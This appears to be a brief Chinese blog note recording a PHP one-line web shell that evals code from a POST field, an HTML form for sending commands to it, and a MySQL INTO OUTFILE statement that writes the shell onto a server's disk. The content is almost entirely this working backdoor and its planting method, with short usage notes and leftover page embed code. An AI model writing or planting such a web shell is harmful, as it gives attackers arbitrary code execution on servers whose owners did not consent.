Php代碼 <EMBED height=15 type=application/x-shockwave-flash pluginspage=http://www.macromedia.com/go/getflashplayer width=14 src=http://happysoul.iteye.com/javascripts/syntaxhighlighter/clipboard_new.swf allowscriptaccess="always" quality="high" flashvars="clipboard=%3C%3Fphp%20%40eval(%24_POST%5B'c'%5D)%3B%3F%3E" wmode="transparent"> javascript
<?php @eval($_POST['c']);?> php
使用方法也很簡單,本地提交文件指向提交文件,裏面的php代碼就會被執行
html
Html代碼 <EMBED height=15 type=application/x-shockwave-flash pluginspage=http://www.macromedia.com/go/getflashplayer width=14 src=http://happysoul.iteye.com/javascripts/syntaxhighlighter/clipboard_new.swf allowscriptaccess="always" quality="high" flashvars="clipboard=%3Chtml%3E%0A%3Cbody%3E%0A%3Cform%20action%3D%22a.php%22%20method%3D%22post%22%3E%0A%3Cinput%20type%3D%22text%22%20name%3D%22c%22%20value%3D%22phpinfo()%3B%22%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22submit%22%3E%0A%3C%2Fform%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A" wmode="transparent"> java
<html> mysql
<body> web
<form action="a.php" method="post"> sql
<input type="text" name="c" value="phpinfo();"> app
<input type="submit" value="submit"> post
</form> spa
</body>
</html>
僅此作個記錄,php這東西真噁心
後補充記錄:
mysql輸出文件
Sql代碼
select '<?php @eval($_POST["c"]);?>' INTO OUTFILE 'e:/m.php'